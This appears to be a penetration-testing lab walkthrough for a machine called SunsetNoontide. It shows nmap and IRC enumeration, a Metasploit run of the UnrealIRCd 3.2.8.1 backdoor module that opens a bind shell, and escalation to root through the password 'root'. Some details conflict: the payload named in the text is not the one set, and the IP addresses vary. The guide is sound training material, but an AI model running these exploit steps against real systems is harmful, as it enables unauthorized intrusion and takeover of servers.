Exploitation Guide for SunsetNoontide
Summary
This machine is exploited via a remote code execution vulnerability in the Unreal IRC server v3.2.8.1. It is then escalated by a very simple password for the root user.
Enumeration
Nmap
We start off by running an nmap scan:
kali@kali:~$ sudo nmap 192.168.187.120 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST Nmap scan report for 192.168.120.228 Host is up (0.035s latency). Not shown: 999 closed ports PORT STATE SERVICE 6667/tcp open irc
IRC
This scan shows a potential IRC server running on port 6667.
Let’s connect to this IRC server to see if we can gather more information.
We’ll use irssi here but any other IRC client will do.
kali@kali:~$ irssi [(status)] /server connect 192.168.187.120 11:11 -!- Irssi: Looking up 192.168.187.120 11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667 11:11 -!- Irssi: Connection to 192.168.187.120 established 11:11 !irc.foonet.com *** Looking up your hostname... 11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead 11:11 -!- You have not registered 11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9 11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1 11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM 11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj 11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server 11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server 11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server 11:11 -!- There are 1 users and 0 invisible on 1 servers 11:11 -!- I have 1 clients and 0 servers 11:11 -!- Current Local Users: 1 Max: 1 11:11 -!- Current Global Users: 1 Max: 1 11:11 -!- MOTD File is missing 11:11 -!- Mode change [+iwx] for user kali`
We see that the IRC server is Unreal version 3.2.8.1
Exploitation
Remote Code Execution
Looking up exploits for this version, we find that it is vulnerable to remote code execution:
kali@kali:~$ searchsploit “3.2.8.1”
Exploit Title | Path
UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 – Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 – Remote Downloader/Execute | linux/remote/13853.pl
—————————————————————————————————————————————————— ———————————
…
We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.187.120 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 6667 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic Target msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) 1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) 3 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 4 cmd/unix/generic normal No Unix Command, Generic Command Execution 5 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) 6 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) 7 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) 8 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) 9 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) 10 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) 11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0 payload => cmd/unix/bind_perl msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run [*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667... :irc.foonet.com NOTICE AUTH :*** Looking up your hostname... [*] 192.168.187.120:6667 - Sending backdoor command... [*] Started bind TCP handler against 192.168.187.120:4444 id [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400 uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth) id uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth) cd /home su root root id uid=0(root) gid=0(root) groups=0(root) uname -a Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux hostname noontide
.